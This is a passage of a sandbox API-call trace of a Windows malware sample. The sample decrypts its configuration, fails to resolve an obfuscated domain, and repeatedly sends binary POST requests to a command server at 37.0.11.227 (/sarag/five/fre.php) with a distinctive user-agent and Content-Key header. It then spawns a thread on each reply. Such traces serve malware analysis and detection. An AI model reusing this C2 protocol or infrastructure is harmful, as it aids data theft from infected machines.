returned 0x76b70000 [0303.662] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0303.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.669] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0303.689] GetProcessHeap () returned 0x690000 [0303.690] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0303.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.694] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0303.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.695] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0303.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.696] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.696] GetProcessHeap () returned 0x690000 [0303.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0303.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.698] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0303.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.704] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0303.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.706] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0303.706] GetProcessHeap () returned 0x690000 [0303.706] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0303.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.706] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0303.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.707] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0303.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.709] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0303.709] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.710] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0303.710] GetProcessHeap () returned 0x690000 [0303.710] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0303.710] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0303.710] GetProcessHeap () returned 0x690000 [0303.711] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0303.711] GetProcessHeap () returned 0x690000 [0303.711] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0303.711] GetProcessHeap () returned 0x690000 [0303.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0303.712] GetProcessHeap () returned 0x690000 [0303.712] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0303.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.713] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0303.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.719] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0303.836] GetProcessHeap () returned 0x690000 [0303.836] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0303.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.837] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0303.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.838] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0303.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.839] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.839] GetProcessHeap () returned 0x690000 [0303.839] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0303.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.840] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0303.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.841] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0303.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.842] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0303.842] GetProcessHeap () returned 0x690000 [0303.842] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0303.842] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.843] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0303.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.843] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0303.844] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.844] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0303.845] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.845] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0303.845] GetProcessHeap () returned 0x690000 [0303.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0303.845] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0303.845] GetProcessHeap () returned 0x690000 [0303.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0303.845] socket (af=2, type=1, protocol=6) returned 0xa00 [0303.848] connect (s=0xa00, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0303.873] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0303.873] GetProcessHeap () returned 0x690000 [0303.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0303.873] GetProcessHeap () returned 0x690000 [0303.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0303.874] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0303.875] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0303.875] GetProcessHeap () returned 0x690000 [0303.875] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0303.875] GetProcessHeap () returned 0x690000 [0303.875] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0303.875] GetProcessHeap () returned 0x690000 [0303.875] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0303.875] GetProcessHeap () returned 0x690000 [0303.875] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0303.876] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0303.877] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0303.877] GetProcessHeap () returned 0x690000 [0303.877] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0303.877] GetProcessHeap () returned 0x690000 [0303.877] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0303.877] send (s=0xa00, buf=0x6ad508*, len=242, flags=0) returned 242 [0303.878] send (s=0xa00, buf=0x6aba40*, len=159, flags=0) returned 159 [0303.878] GetProcessHeap () returned 0x690000 [0303.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0303.878] recv (in: s=0xa00, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0304.130] GetProcessHeap () returned 0x690000 [0304.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0304.131] GetProcessHeap () returned 0x690000 [0304.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0304.131] GetProcessHeap () returned 0x690000 [0304.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0304.132] GetProcessHeap () returned 0x690000 [0304.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0304.132] closesocket (s=0xa00) returned 0 [0304.132] GetProcessHeap () returned 0x690000 [0304.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0304.132] GetProcessHeap () returned 0x690000 [0304.133] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0304.133] GetProcessHeap () returned 0x690000 [0304.133] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0304.134] GetProcessHeap () returned 0x690000 [0304.134] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0304.157] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1454) returned 0xa00 [0304.159] Sleep (dwMilliseconds=0xea60) [0304.181] GetProcessHeap () returned 0x690000 [0304.181] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0304.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.182] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.189] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0304.199] GetProcessHeap () returned 0x690000 [0304.200] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0304.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.201] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0304.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.202] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.202] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.203] GetProcessHeap () returned 0x690000 [0304.203] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0304.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.204] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0304.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.205] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0304.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.206] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0304.206] GetProcessHeap () returned 0x690000 [0304.206] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0304.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.206] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0304.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.207] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0304.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.210] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0304.210] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.211] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0304.211] GetProcessHeap () returned 0x690000 [0304.211] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0304.211] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0304.211] GetProcessHeap () returned 0x690000 [0304.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0304.212] GetProcessHeap () returned 0x690000 [0304.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0304.212] GetProcessHeap () returned 0x690000 [0304.213] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0304.213] GetProcessHeap () returned 0x690000 [0304.213] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0304.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.214] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.218] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0304.225] GetProcessHeap () returned 0x690000 [0304.225] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0304.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.226] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0304.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.227] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.228] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.228] GetProcessHeap () returned 0x690000 [0304.228] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0304.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.229] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0304.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.231] CryptDestroyKey (hKey=0x69d628) returned 1 [0304.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.233] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0304.233] GetProcessHeap () returned 0x690000 [0304.233] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0304.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.234] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0304.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.235] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0304.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.236] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0304.237] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.237] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0304.237] GetProcessHeap () returned 0x690000 [0304.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0304.237] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0304.237] GetProcessHeap () returned 0x690000 [0304.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0304.237] socket (af=2, type=1, protocol=6) returned 0xa04 [0304.238] connect (s=0xa04, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0304.268] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0304.268] GetProcessHeap () returned 0x690000 [0304.268] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0304.268] GetProcessHeap () returned 0x690000 [0304.268] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0304.269] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0304.269] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0304.269] GetProcessHeap () returned 0x690000 [0304.270] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0304.270] GetProcessHeap () returned 0x690000 [0304.270] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0304.270] GetProcessHeap () returned 0x690000 [0304.270] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0304.270] GetProcessHeap () returned 0x690000 [0304.270] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0304.271] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0304.272] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0304.272] GetProcessHeap () returned 0x690000 [0304.272] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0304.272] GetProcessHeap () returned 0x690000 [0304.272] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0304.272] send (s=0xa04, buf=0x6ad508*, len=242, flags=0) returned 242 [0304.273] send (s=0xa04, buf=0x6aba40*, len=159, flags=0) returned 159 [0304.273] GetProcessHeap () returned 0x690000 [0304.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0304.273] recv (in: s=0xa04, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0304.349] GetProcessHeap () returned 0x690000 [0304.350] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0304.350] GetProcessHeap () returned 0x690000 [0304.350] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0304.350] GetProcessHeap () returned 0x690000 [0304.350] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0304.350] GetProcessHeap () returned 0x690000 [0304.351] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0304.351] closesocket (s=0xa04) returned 0 [0304.351] GetProcessHeap () returned 0x690000 [0304.351] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0304.351] GetProcessHeap () returned 0x690000 [0304.352] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0304.352] GetProcessHeap () returned 0x690000 [0304.352] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0304.352] GetProcessHeap () returned 0x690000 [0304.352] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0304.353] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14c8) returned 0xa04 [0304.355] Sleep (dwMilliseconds=0xea60) [0304.356] GetProcessHeap () returned 0x690000 [0304.356] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0304.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.358] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.366] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0304.372] GetProcessHeap () returned 0x690000 [0304.372] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0304.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.373] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0304.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.377] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.378] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.378] GetProcessHeap () returned 0x690000 [0304.378] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: 